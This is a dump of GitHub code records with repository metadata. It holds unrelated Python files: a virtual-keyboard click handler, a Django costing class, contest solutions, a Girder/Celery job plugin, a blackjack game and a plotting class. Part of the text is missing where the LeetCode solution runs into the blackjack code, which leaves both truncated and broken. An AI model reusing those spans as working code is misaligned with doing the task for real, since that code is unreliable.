\"~\"],\r\n [\"Caps\", \"A\", \"S\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \":\", \"@\", \"Enter\"],\r\n [\"Shift\", \"|\", \"Z\", \"X\", \"C\", \"V\", \"B\", \"N\", \"M\", \"<\", \">\", \"?\", \"Shift\"],\r\n [\"Ctrl\", \"Win\", \"Alt\", \"Space\", \"AltGr\", \"Settings\", \"Ctrl\", \"Slider\"]]\r\n\r\n# keyboard to be used\r\ncase_list = [[]]\r\n\r\n\r\ndef on_click1(x, y, button, pressed):\r\n\r\n if pressed:\r\n\r\n # logging.info(\"Mouse clicked at ===> ({0}, {1})\".format(x, y))\r\n\r\n dynamic_rect = GetWindowRect(hwnd) # this needs to stay dynamic for if window is moved, so inside 'on_click'\r\n x_window = (dynamic_rect[0] + 10) # account for difference between mouse and window xy\r\n y_window = (dynamic_rect[1])\r\n\r\n # if shift/caps is pressed set appropriate keyboard\r\n if caps == 0:\r\n case_list = lower_list\r\n if caps == 5:\r\n case_list = upper_list\r\n\r\n # Coordinate Checker for 1080p\r\n if is1080p: # if 1080p then...\r\n # Converting VK range of XY 1920x1080\r\n x_window = x_window / 80\r\n x_window = x_window * 100\r\n x_window = int(round(x_window))\r\n\r\n y_window = y_window / 80\r\n y_window = y_window * 100\r\n y_window = int(round(y_window))\r\n\r\n y_window = y_window + 40 # accounts for title bar pixels\r\n x_window = x_window - 3 # need this for\r\n\r\n else:\r\n y_window = y_window + 30 # title bar pixels - same calc as ^res^ ((40 / 100) * 83.33)\r\n x_window = x_window - 4\r\n\r\n # needs work around the very edges(1 or 2 pixels off for the sake of having round numbers in the code)\r\n\r\n# Row 0\r\n if y > y_window and y <= y_window + 36: # this range of y values represents the first row in the VK\r\n if x > x_window and x < x_window + 64: # these IF's move along the keys in increments of 64 (width of keys)\r\n print(case_list[0][0])\r\n # logging.info(\"Esc\")\r\n if x > x_window + 64 and x < x_window + 128:\r\n print(case_list[0][1])\r\n # logging.info(\"F1\")\r\n if x > x_window + 128 and x < x_window + 192:\r\n print(case_list[0][2])\r\n # logging.info(\"F2\")\r\n if x > x_window + 192 and x < x_window + 256:\r\n print(case_list[0][3])\r\n # logging.info(\"F3\")\r\n if x > x_window + 256 and x < x_window + 320:\r\n print(case_list[0][4])\r\n # logging.info(\"F4\")\r\n if x > x_window + 320 and x < x_window + 384:\r\n print(case_list[0][5])\r\n # logging.info(\"F5\")\r\n if x > x_window + 384 and x < x_window + 448:\r\n print(case_list[0][6])\r\n # logging.info(\"F6\")\r\n if x > x_window + 448 and x < x_window + 512:\r\n print(case_list[0][7])\r\n # logging.info(\"F7\")\r\n if x > x_window + 512 and x < x_window + 576:\r\n print(case_list[0][8])\r\n # logging.info(\"F8\")\r\n if x > x_window + 576 and x < x_window + 640:\r\n print(case_list[0][9])\r\n # logging.info(\"F9\")\r\n if x > x_window + 640 and x < x_window + 704:\r\n print(case_list[0][10])\r\n # logging.info(\"F10\")\r\n if x > x_window + 704 and x < x_window + 768:\r\n print(case_list[0][11])\r\n # logging.info(\"F11\")\r\n if x > x_window + 768 and x < x_window + 832:\r\n print(case_list[0][12])\r\n # logging.info(\"F12\")\r\n if x > x_window + 832 and x < x_window + 9401:\r\n print(case_list[0][13])\r\n # logging.info(\"Del\")\r\n\r\n\r\n# Row 1\r\n if y > y_window + 36 and y <= y_window + 72: # range moves up by 36 for next row\r\n if x > x_window and x <= x_window + 64: # these IF's move along the keys in increments of 64(width of keys)\r\n print(case_list[1][0])\r\n # logging.info(\"'\")\r\n if x > x_window + 64 and x <= x_window + 128:\r\n print(case_list[1][1])\r\n # logging.info(\"1\")\r\n if x > x_window + 128 and x <= x_window + 192:\r\n print(case_list[1][2])\r\n # logging.info(\"2\")\r\n if x > x_window + 192 and x <= x_window + 256:\r\n print(case_list[1][3])\r\n # logging.info(\"3\")\r\n if x > x_window + 256 and x <= x_window + 320:\r\n print(case_list[1][4])\r\n # logging.info(\"4\")\r\n if x > x_window + 320 and x <= x_window + 384:\r\n print(case_list[1][5])\r\n # logging.info(\"5\")\r\n if x > x_window + 384 and x <= x_window + 448:\r\n print(case_list[1][6])\r\n # logging.info(\"6\")\r\n if x > x_window + 448 and x <= x_window + 512:\r\n print(case_list[1][7])\r\n # logging.info(\"7\")\r\n if x > x_window + 512 and x <= x_window + 576:\r\n print(case_list[1][8])\r\n # logging.info(\"8\")\r\n if x > x_window + 576 and x <= x_window + 640:\r\n print(case_list[1][9])\r\n # logging.info(\"9\")\r\n if x > x_window + 640 and x <= x_window + 704:\r\n print(case_list[1][10])\r\n # logging.info(\"0\")\r\n if x > x_window + 704 and x <= x_window + 768:\r\n print(case_list[1][11])\r\n # logging.info(\"-\")\r\n if x > x_window + 768 and x <= x_window + 832:\r\n print(case_list[1][12])\r\n # logging.info(\"=\")\r\n if x > x_window + 832 and x <= x_window + 940: # not sure why this isn't 960 (diagram)\r\n print(case_list[1][13])\r\n # logging.info(\"Backspace\")\r\n\r\n\r\n# Row 2\r\n if y > y_window + 72 and y <= y_window + 108: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 108: # these IFs move along the keys in increments of 75 (width of keys)\r\n print(case_list[2][0])\r\n # logging.info(\"Tab\")\r\n if x > x_window + 108 and x < x_window + 172:\r\n print(case_list[2][1])\r\n # logging.info(\"q\")\r\n if x > x_window + 172 and x < x_window + 236:\r\n print(case_list[2][2])\r\n # logging.info(\"w\")\r\n if x > x_window + 236 and x < x_window + 300:\r\n print(case_list[2][3])\r\n # logging.info(\"e\")\r\n if x > x_window + 300 and x < x_window + 364:\r\n print(case_list[2][4])\r\n # logging.info(\"r\")\r\n if x > x_window + 364 and x < x_window + 428:\r\n print(case_list[2][5])\r\n # logging.info(\"t\")\r\n if x > x_window + 428 and x < x_window + 492:\r\n print(case_list[2][6])\r\n # logging.info(\"y\")\r\n if x > x_window + 492 and x < x_window + 556:\r\n print(case_list[2][7])\r\n # logging.info(\"u\")\r\n if x > x_window + 556 and x < x_window + 620:\r\n print(case_list[2][8])\r\n # logging.info(\"i\")\r\n if x > x_window + 620 and x < x_window + 684:\r\n print(case_list[2][9])\r\n # logging.info(\"o\")\r\n if x > x_window + 684 and x < x_window + 748:\r\n print(case_list[2][10])\r\n # logging.info(\"p\")\r\n if x > x_window + 748 and x < x_window + 812:\r\n print(case_list[2][11])\r\n # logging.info(\"[\")\r\n if x > x_window + 812 and x < x_window + 876:\r\n print(case_list[2][12])\r\n # logging.info(\"]\")\r\n if x > x_window + 876 and x < x_window + 940:\r\n print(case_list[2][13])\r\n # logging.info(\"#\")\r\n\r\n\r\n# Row 3\r\n if y > y_window + 108 and y <= y_window + 144: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 128: # these IF's move along the keys in increments of 75 (width of keys\r\n # print(case_list[3][0])\r\n # logging.info(\"Caps\")\r\n changer() # calls function to alternate caps value between 0 and 5(upper/lower)\r\n\r\n if x > x_window + 128 and x < x_window + 192:\r\n print(case_list[3][1])\r\n # logging.info(\"a\")\r\n if x > x_window + 192 and x < x_window + 256:\r\n print(case_list[3][2])\r\n # logging.info(\"s\")\r\n if x > x_window + 256 and x < x_window + 320:\r\n print(case_list[3][3])\r\n # logging.info(\"d\")\r\n if x > x_window + 320 and x < x_window + 384:\r\n print(case_list[3][4])\r\n # logging.info(\"f\")\r\n if x > x_window + 384 and x < x_window + 448:\r\n print(case_list[3][5])\r\n # logging.info(\"g\")\r\n if x > x_window + 448 and x < x_window + 512:\r\n print(case_list[3][6])\r\n # logging.info(\"h\")\r\n if x > x_window + 512 and x < x_window + 576:\r\n print(case_list[3][7])\r\n # logging.info(\"j\")\r\n if x > x_window + 576 and x < x_window + 640:\r\n print(case_list[3][8])\r\n # logging.info(\"k\")\r\n if x > x_window + 640 and x < x_window + 704:\r\n print(case_list[3][9])\r\n # logging.info(\"l\")\r\n if x > x_window + 704 and x < x_window + 768:\r\n print(case_list[3][10])\r\n # logging.info(\";\")\r\n if x > x_window + 768 and x < x_window + 832:\r\n print(case_list[3][11])\r\n # logging.info(\"'\")\r\n if x > x_window + 832 and x < x_window + 940:\r\n # key_enter = True # may need something like this for post log handling\r\n print(case_list[3][12])\r\n # logging.info(\"Enter\")\r\n\r\n\r\n# Row 4\r\n if y > y_window + 144 and y <= y_window + 180: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 108: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[4][0])\r\n # logging.info(\"Shift\")\r\n if x > x_window + 108 and x < x_window + 172:\r\n print(case_list[4][1])\r\n # logging.info(\" \\ \")\r\n if x > x_window + 172 and x < x_window + 236:\r\n print(case_list[4][2])\r\n # logging.info(\"z\")\r\n if x > x_window + 236 and x < x_window + 300:\r\n print(case_list[4][3])\r\n # logging.info(\"x\")\r\n if x > x_window + 300 and x < x_window + 364:\r\n print(case_list[4][4])\r\n # logging.info(\"c\")\r\n if x > x_window + 364 and x < x_window + 428:\r\n print(case_list[4][5])\r\n # logging.info(\"v\")\r\n if x > x_window + 428 and x < x_window + 492:\r\n print(case_list[4][6])\r\n # logging.info(\"b\")\r\n if x > x_window + 492 and x < x_window + 556:\r\n print(case_list[4][7])\r\n # logging.info(\"n\")\r\n if x > x_window + 556 and x < x_window + 620:\r\n print(case_list[4][8])\r\n # logging.info(\"m\")\r\n if x > x_window + 620 and x < x_window + 684:\r\n print(case_list[4][9])\r\n # logging.info(\",\")\r\n if x > x_window + 684 and x < x_window + 748:\r\n print(case_list[4][10])\r\n # logging.info(\".\")\r\n if x > x_window + 748 and x < x_window + 812:\r\n print(case_list[4][11])\r\n # logging.info(\"/\")\r\n if x > x_window + 812 and x < x_window + 940:\r\n print(case_list[4][12])\r\n # logging.info(\"Shift\")\r\n\r\n\r\n# Row 5\r\n if y > y_window + 180 and y <= y_window + 216: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 86: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][0])\r\n # logging.info(\"Ctrl\")\r\n if x > x_window + 86 and x < x_window + 150:\r\n print(case_list[5][1])\r\n # logging.info(\"Win\")\r\n if x > x_window + 150 and x < x_window + 214:\r\n print(case_list[5][2])\r\n # logging.info(\"Alt\")\r\n if x > x_window + 214 and x < x_window + 588: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][3])\r\n # logging.info(\"Space\")\r\n if x > x_window + 588 and x < x_window + 673: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][4])\r\n # logging.info(\"AltGr\")\r\n if x > x_window + 673 and x < x_window + 748: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][5])\r\n # logging.info(\"Settings\")\r\n if x > x_window + 748 and x < x_window + 812: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][6])\r\n # logging.info(\"Ctrl\")\r\n if x > x_window + 812 and x < x_window + 940: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][7])\r\n # logging.info(\"Transparency Slider\")\r\n\r\n#\r\n# run continuously?\r\nwith Listener(on_click=on_click1) as listener:\r\n listener.join()\r\n\r\n","repo_name":"CillianTobin/B00099032","sub_path":"mouse_capture(21-04-2019).py","file_name":"mouse_capture(21-04-2019).py","file_ext":"py","file_size_in_byte":15968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36247024938","text":"from pprint import pprint\n\nfrom django.core.cache import cache\n\nfrom utils.cache import timeout\nfrom utils.functions import my_make_key_cache, fo2logger\n\nimport produto.queries\n\n\nclass CustoItem:\n def __init__(self, cursor, nivel, ref, tam, cor, alt, consumo=1):\n self.data = []\n self.cursor = cursor\n self.nivel = nivel\n self.ref = ref\n self.tam = tam\n self.cor = cor\n self.alt = alt\n self.consumo = consumo\n\n def componentes_e_custo(\n self, cursor, estrut_nivel, nivel, ref, tam, cor, alt,\n consumo, consumo_pai):\n if estrut_nivel == 0:\n narrativa = produto.queries.item_narrativa(\n cursor, nivel, ref, tam, cor)\n if not narrativa:\n return []\n componentes = [{\n 'ESTRUT_NIVEL': 0, 'SEQ': '',\n 'NIVEL': nivel, 'REF': ref, 'TAM': tam, 'COR': cor,\n 'DESCR': narrativa[0]['NARRATIVA'],\n 'ALT': alt, 'CONSUMO': consumo, 'PRECO': '', 'CUSTO': '',\n 'TCALC': 0, 'RBANHO': 0, 'TEMALT': 0,\n }]\n else:\n componentes = produto.queries.item_comps_custo(\n cursor, nivel, ref, tam, cor, alt)\n\n total_custo = 0\n if componentes and self.data:\n self.data[-1]['TEMALT'] = 1\n for comp in componentes:\n if comp['CONSUMO'] is None:\n comp['CONSUMO'] = 0\n self.data.append(comp)\n comp['TEMALT'] = 0\n comp['ESTRUT_NIVEL'] = estrut_nivel\n if comp['NIVEL'] != 9:\n sub_custo = self.componentes_e_custo(\n cursor, estrut_nivel+1,\n comp['NIVEL'], comp['REF'],\n comp['TAM'], comp['COR'], comp['ALT'],\n comp['CONSUMO'], consumo)\n if sub_custo > 0:\n comp['PRECO'] = sub_custo\n if comp['TCALC'] == 2: # g/l\n comp['CONSUMO'] *= comp['RBANHO']\n comp['CUSTO'] = comp['CONSUMO'] * comp['PRECO']\n total_custo += 0 if isinstance(\n comp['CUSTO'], str) else comp['CUSTO']\n return total_custo\n\n def get_data(self):\n # key_cache = make_key_cache(\n # obey=[\n # self.nivel,\n # self.ref,\n # self.tam,\n # self.cor,\n # self.alt,\n # self.consumo,\n # ]\n # )\n key_cache = my_make_key_cache(\n 'CustoItem', self.nivel, self.ref, self.tam, self.cor, self.alt,\n self.consumo)\n cached_result = cache.get(key_cache)\n if cached_result is not None:\n fo2logger.info('cached '+key_cache)\n return cached_result\n\n self.componentes_e_custo(\n self.cursor, 0,\n self.nivel, self.ref, self.tam, self.cor, self.alt,\n self.consumo, 1)\n result = self.data\n\n cache.set(key_cache, result, timeout=timeout.MINUTES_5)\n fo2logger.info('calculated '+key_cache)\n return result\n","repo_name":"anselmobd/fo2","sub_path":"src/produto/queries/custo_item.py","file_name":"custo_item.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13735668330","text":"import sys\nsys.setrecursionlimit(10**7)\ninput = sys.stdin.readline\n\nn = int(input())\np = []\nfor i in range(n):\n x = int(input())\n p.append(x)\n\nma = max(p)\ns = sum(p)\n\nprint(s - ma + ma // 2)\n","repo_name":"urawa72/procon","sub_path":"atcorder/abc115/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14862431316","text":"import turtle\nimport math\nimport time\nturtle.shape('turtle')\nl = 11\na=50\ndef star(n):\n for i in range(1, n+1, 1):\n turtle.left(180-(180/n))\n turtle.forward(a)\n time.sleep(20)\nstar(l)\n\n","repo_name":"evgeniy-mirohin/Python_","sub_path":"звезды.py","file_name":"звезды.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6927945510","text":"valores = []\nr = \"s\"\nwhile r != \"N\":\n valores.append(int(input(\"Digite um valor \")))\n r = input(\"Gostaria de continuar? \").strip().upper()\nprint(f\"No total {len(valores)}, foram digitados, sendo eles: \")\nvalores.sort(reverse=True)\nfor c in range (len(valores)):\n print(valores[c],end=\"..,\")\nif 5 in valores:\n print(f\"\\nO número cinco foi encontrado na posição {valores.index(5)+1}\")\nelse:\n print(\"\\nO Valor 5 não foi encontrado\")","repo_name":"Peedrooo/Learning_Python","sub_path":"CursoEmVideo/Exercício81.py","file_name":"Exercício81.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6844663118","text":"from celery.result import AsyncResult\n\nfrom girder import events, logger\nfrom girder.constants import AccessType\nfrom girder.exceptions import ValidationException\nfrom girder.plugins.jobs.constants import JobStatus\nfrom girder.plugins.jobs.models.job import Job\nfrom girder.utility import setting_utilities\n\nfrom .constants import PluginSettings\nfrom .utils import getWorkerApiUrl, jobInfoSpec, getCeleryApp\nfrom .api.worker import Worker\n\n\nclass CustomJobStatus(object):\n \"\"\"\n The custom job status flags for the worker.\n \"\"\"\n FETCHING_INPUT = 820\n CONVERTING_INPUT = 821\n CONVERTING_OUTPUT = 822\n PUSHING_OUTPUT = 823\n CANCELING = 824\n\n # valid transitions for worker scheduled jobs\n valid_worker_transitions = {\n JobStatus.QUEUED: [JobStatus.INACTIVE],\n JobStatus.RUNNING: [JobStatus.QUEUED, FETCHING_INPUT],\n FETCHING_INPUT: [JobStatus.RUNNING],\n CONVERTING_INPUT: [JobStatus.RUNNING, FETCHING_INPUT],\n CONVERTING_OUTPUT: [JobStatus.RUNNING],\n PUSHING_OUTPUT: [JobStatus.RUNNING, CONVERTING_OUTPUT],\n CANCELING: [JobStatus.INACTIVE, JobStatus.QUEUED, JobStatus.RUNNING],\n JobStatus.ERROR: [FETCHING_INPUT, CONVERTING_INPUT, CONVERTING_OUTPUT,\n PUSHING_OUTPUT, CANCELING, JobStatus.QUEUED,\n JobStatus.RUNNING],\n # The last two are allowed for revoke called from outside Girder\n JobStatus.CANCELED: [CANCELING, JobStatus.QUEUED, JobStatus.RUNNING],\n JobStatus.SUCCESS: [JobStatus.RUNNING, PUSHING_OUTPUT]\n }\n\n # valid transitions for celery scheduled jobs\n # N.B. We have the extra worker input/output states defined here for when\n # we are running girder_worker.run as a regular celery task\n valid_celery_transitions = {\n JobStatus.QUEUED: [JobStatus.INACTIVE],\n # Note celery tasks can jump straight from INACTIVE to RUNNING\n JobStatus.RUNNING: [JobStatus.INACTIVE, JobStatus.QUEUED,\n FETCHING_INPUT],\n FETCHING_INPUT: [JobStatus.RUNNING],\n CONVERTING_INPUT: [JobStatus.RUNNING, FETCHING_INPUT],\n CONVERTING_OUTPUT: [JobStatus.RUNNING],\n PUSHING_OUTPUT: [JobStatus.RUNNING, CONVERTING_OUTPUT],\n CANCELING: [JobStatus.INACTIVE, JobStatus.QUEUED, JobStatus.RUNNING],\n JobStatus.ERROR: [FETCHING_INPUT, CONVERTING_INPUT, CONVERTING_OUTPUT,\n PUSHING_OUTPUT, CANCELING, JobStatus.QUEUED,\n JobStatus.RUNNING],\n JobStatus.CANCELED: [CANCELING, JobStatus.INACTIVE, JobStatus.QUEUED,\n JobStatus.RUNNING],\n JobStatus.SUCCESS: [JobStatus.RUNNING, PUSHING_OUTPUT]\n }\n\n @classmethod\n def isValid(cls, status):\n return status in (\n cls.FETCHING_INPUT,\n cls.CONVERTING_INPUT,\n cls.CONVERTING_OUTPUT,\n cls.PUSHING_OUTPUT,\n cls.CANCELING\n )\n\n @classmethod\n def validTransitionsWorker(cls, status):\n return cls.valid_worker_transitions.get(status)\n\n @classmethod\n def validTransitionsCelery(cls, status):\n return cls.valid_celery_transitions.get(status)\n\n\ndef schedule(event):\n \"\"\"\n This is bound to the \"jobs.schedule\" event, and will be triggered any time\n a job is scheduled. This handler will process any job that has the\n handler field set to \"worker_handler\".\n \"\"\"\n job = event.info\n if job['handler'] == 'worker_handler':\n task = job.get('celeryTaskName', 'girder_worker.run')\n\n # Set the job status to queued\n Job().updateJob(job, status=JobStatus.QUEUED)\n\n # Send the task to celery\n asyncResult = getCeleryApp().send_task(\n task, job['args'], job['kwargs'], queue=job.get('celeryQueue'), headers={\n 'jobInfoSpec': jobInfoSpec(job, job.get('token', None)),\n 'apiUrl': getWorkerApiUrl()\n })\n\n # Record the task ID from celery.\n Job().updateJob(job, otherFields={\n 'celeryTaskId': asyncResult.task_id\n })\n\n # Stop event propagation since we have taken care of scheduling.\n event.stopPropagation()\n\n\ndef cancel(event):\n \"\"\"\n This is bound to the \"jobs.cancel\" event, and will be triggered any time\n a job is canceled. This handler will process any job that has the\n handler field set to \"worker_handler\".\n \"\"\"\n job = event.info\n if job['handler'] in ['worker_handler', 'celery_handler']:\n # Stop event propagation and prevent default, we are using a custom state\n event.stopPropagation().preventDefault()\n\n celeryTaskId = job.get('celeryTaskId')\n\n if celeryTaskId is None:\n msg = (\"Unable to cancel Celery task. Job '%s' doesn't have a Celery task id.\"\n % job['_id'])\n logger.warn(msg)\n return\n\n if job['status'] not in [CustomJobStatus.CANCELING, JobStatus.CANCELED,\n JobStatus.SUCCESS, JobStatus.ERROR]:\n # Set the job status to canceling\n Job().updateJob(job, status=CustomJobStatus.CANCELING)\n\n # Send the revoke request.\n asyncResult = AsyncResult(celeryTaskId, app=getCeleryApp())\n asyncResult.revoke()\n\n\n@setting_utilities.validator({\n PluginSettings.API_URL\n})\ndef validateApiUrl(doc):\n val = doc['value']\n if val and not val.startswith('http://') and not val.startswith('https://'):\n raise ValidationException('API URL must start with http:// or https://.', 'value')\n\n\n@setting_utilities.validator(PluginSettings.DIRECT_PATH)\ndef _validateAutoCompute(doc):\n if not isinstance(doc['value'], bool):\n raise ValidationException('The direct path setting must be true or false.')\n\n\ndef validateJobStatus(event):\n \"\"\"Allow our custom job status values.\"\"\"\n if CustomJobStatus.isValid(event.info):\n event.preventDefault().addResponse(True)\n\n\ndef validTransitions(event):\n \"\"\"Allow our custom job transitions.\"\"\"\n states = None\n if event.info['job']['handler'] == 'worker_handler':\n states = CustomJobStatus.validTransitionsWorker(event.info['status'])\n elif event.info['job']['handler'] == 'celery_handler':\n states = CustomJobStatus.validTransitionsCelery(event.info['status'])\n if states is not None:\n event.preventDefault().addResponse(states)\n\n\ndef attachParentJob(event):\n \"\"\"Attach parentJob before a model is saved.\"\"\"\n job = event.info\n if job.get('celeryParentTaskId'):\n celeryParentTaskId = job['celeryParentTaskId']\n parentJob = Job().findOne({'celeryTaskId': celeryParentTaskId})\n event.info['parentId'] = parentJob['_id']\n\n\ndef attachJobInfoSpec(event):\n \"\"\"Attach jobInfoSpec after a model is saved.\"\"\"\n job = event.info\n # Local jobs have a module key\n if not job.get('module'):\n Job().updateJob(job, otherFields={'jobInfoSpec': jobInfoSpec(job)})\n\n\ndef load(info):\n info['apiRoot'].worker = Worker()\n\n events.bind('jobs.schedule', 'worker', schedule)\n events.bind('jobs.status.validate', 'worker', validateJobStatus)\n events.bind('jobs.status.validTransitions', 'worker', validTransitions)\n events.bind('jobs.cancel', 'worker', cancel)\n events.bind('model.job.save.after', 'worker', attachJobInfoSpec)\n events.bind('model.job.save', 'worker', attachParentJob)\n Job().exposeFields(AccessType.SITE_ADMIN, {'celeryTaskId', 'celeryQueue'})\n","repo_name":"ShenQianwithC/girder-pv","sub_path":"plugins/worker/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2038071663","text":"# 38. Count and Say\n# https://leetcode.com/problems/count-and-say/\n\n\nclass Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n i = 1\n res = '1'\n while i 21:\r\n #print(\"User sum over 21\")\r\n if 11 in user: # User is over 21 but has ACE\r\n print(\"You have ACE so it will count as 1\")\r\n user.remove(11)\r\n user.append(1)\r\n #print('user',user)\r\n\r\n else: # User is over 21 and dont have ACE \r\n return \"User Loss\"\r\n\r\nwhile True:\r\n main_choice = input(\"\\nDo you want to play Backjack game, Type 'y' or 'n': \").lower()\r\n if main_choice == 'n':\r\n break\r\n\r\n elif main_choice == 'y':\r\n print(logo)\r\n \r\n if len(user) > 0:\r\n user.clear()\r\n comp.clear()\r\n\r\n print(\"\\nAdded 2 cards for you and computer\")\r\n\r\n for _ in range(2):\r\n get_card(user)\r\n get_card(comp)\r\n\r\n print(f\"Your cards are {user} and score is {sum(user)}\")\r\n print(f'Computers first card is: [{comp[0]}]')\r\n\r\n while True:\r\n # Check for Black Jack\r\n if sum(user) == 21 and 11 in user:\r\n if sum(comp) == 21: # If user and comp both have blackjack then computer must win.\r\n print(\"\\nComputer win with Blackjack...!!!!!\")\r\n break\r\n else:\r\n print(\"\\nYou win with Blackjack...!!!!!\")\r\n break\r\n elif sum(comp) == 21 and 11 in comp:\r\n print(\"\\nComputer win with Blackjack...!!!!!\")\r\n break\r\n \r\n choice = input(\"\\nType 'Y' to add card or 'N' to pass: \").lower()\r\n if choice == 'y':\r\n get_card(user) # Get Random card\r\n\r\n result = score(user, comp)\r\n print(f\"\\nYour cards are {user} and score is {sum(user)}\")\r\n print('Computers first card: ',comp[0])\r\n \r\n if result == 'User Loss':\r\n print(\"\\nYour score is more than 21 so Computer wins...!!!\")\r\n break\r\n \r\n elif choice == 'n':\r\n if sum(comp) < 17: # Computers score is less than 17\r\n print(\"\\nComputers turn\")\r\n get_card(comp) # One more card is added for computer\r\n\r\n if sum(comp) > 21:\r\n print(\"\\nComputer wins...!!!!\")\r\n break\r\n\r\n elif sum(comp) > sum(user):\r\n print(\"\\nComputer wins...!!!!\")\r\n break\r\n\r\n elif sum(comp) < sum(user):\r\n print(\"\\nYou wins...!!!!\")\r\n break\r\n\r\n elif sum(comp) == sum(user):\r\n print(\"\\nDraw...!!!!\")\r\n break\r\n break\r\n \r\n print(f\"\\nYour cards are {user} and Final Score is {sum(user)}\")\r\n print(f\"Computers's cards are {comp} and Final Score is {sum(comp)}\")\r\n","repo_name":"Prakash-Shelar1891/Python-Mini-Projects","sub_path":"Blackjack Game.py","file_name":"Blackjack Game.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32406770178","text":"import numpy as np\nfrom scipy import stats\n\nimport matplotlib\n#matplotlib.use(\"Qt5Agg\") # use PyQt5\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection,Line3DCollection\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib import rc\n\nimport os\n\n\ndef makeLabelList2D(bracket1,bracket2,IndexArray):\n '''\n returns the 2D indices formated with chosen bracket\n ''' \n LabelList=list()\n for ix in range(IndexArray.shape[1]):\n #print(IndexArray[:,ix])\n formattedline =(bracket1+'%i,%i'+bracket2) % ( tuple(IndexArray[:,ix]) )\n LabelList.append(formattedline)\n\n return np.array(LabelList)\n\n\nclass PCPlotter(object): \n \n def __init__(self,primary,secondary=None,plane_quad=None,\n grid2D=None,plane_PC=None,BI=None):\n #primary plot coordinate list\n self.primary=primary\n # secondary data for comparison\n if secondary is not None:\n self.secondary = secondary\n else:\n self.secondary =None\n # best fit plane vertices \n if plane_quad is not None:\n self.plane_quad = plane_quad\n else:\n self.plane_quad = None\n # best fit in plane: all grid points \n if grid2D is not None:\n self.grid2D = grid2D\n else:\n self.grid2D = None\n # in-plane experimental scan points from PC fit \n if plane_PC is not None:\n self.plane_PC = plane_PC\n else:\n self.plane_PC = None \n # beam indices for PC value list \n if BI is not None:\n self.BI = BI\n else:\n self.BI = None \n self.PLOT_SCAN_LABELS=True \n \n\n \n def plot(self,plotdir='.', show=False, plot3d=False):\n ''' plot projection centers\n '''\n if not os.path.exists(plotdir):\n print('pcplotter, creating dir: ',plotdir)\n os.makedirs(plotdir)\n \n \n primary=self.primary\n if self.secondary is not None:\n secondary=self.secondary\n \n if self.secondary is not None:\n error_vecs= self.secondary - self.primary\n #errors=np.ravel(np.abs(error_vecs[:,1])) # check xyz\n errors=np.linalg.norm( error_vecs, axis=1)\n #print(errors) \n \n #errors=np.mean(np.abs(secondary[:,0] - primary[:,0]))\n #print(\"Mean error of projective primary:\", np.mean(errors))\n print(\"Median error of projective fit:\", np.median(errors))\n fig = plt.figure()\n plt.hist(errors,bins=71)\n plt.title('projective geometry model: estimation of single-pattern error\\n'\n +'median of errors={0: >#05.2f} $\\mu m$'. format(float(np.median(errors))))\n plt.ylabel('number of measurements', color='k', fontsize=22)\n plt.xlabel(r'$|PC_{\\mathrm{exp}}-PC_{\\mathrm{projective}}|$ ($\\mu m$)', color='k',fontsize=22) \n plt.savefig(plotdir+'PCXYZ_ERRORS.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n\n if (self.grid2D is not None):\n # this plot is in the SAMPLE SYSTEM\n # (x axis opposite direction to Detector-X)\n X_AXIS_FACTOR=-1.0\n fig, ax = plt.subplots(1,1)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'Y$_{SAMPLE}$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'X$_{SAMPLE}$ ($\\mu m$)', color='k',fontsize=22)\n\n ax.scatter(X_AXIS_FACTOR*self.grid2D.T[0],self.grid2D.T[1],s=8,c='lightblue',alpha=0.9, lw=0)\n # experimental points\n if self.plane_PC is not None:\n #print(self.plane_PC.T[0], self.plane_PC.T[1])\n ax.scatter(X_AXIS_FACTOR*self.plane_PC.T[0], self.plane_PC.T[1], s=5, c='k', alpha=0.9, lw=0)\n # labels\n if self.PLOT_SCAN_LABELS:\n labels = makeLabelList2D('(',')',self.BI.T[0:2])\n # todo: logging\n #print(labels)\n #print(self.plane_PC.T[0], self.plane_PC.T[1])\n for label, x, y in zip(labels, np.ravel(X_AXIS_FACTOR*self.plane_PC.T[0]), np.ravel(self.plane_PC.T[1])):\n ax.annotate(\n label, zorder=105,\n xy = (x, y), xytext = (0, 10), fontsize=6,\n color='black', #weight='bold',\n textcoords = 'offset points', ha = 'center', va = 'bottom',\n bbox = dict(boxstyle = 'round,pad=0.2', fc = 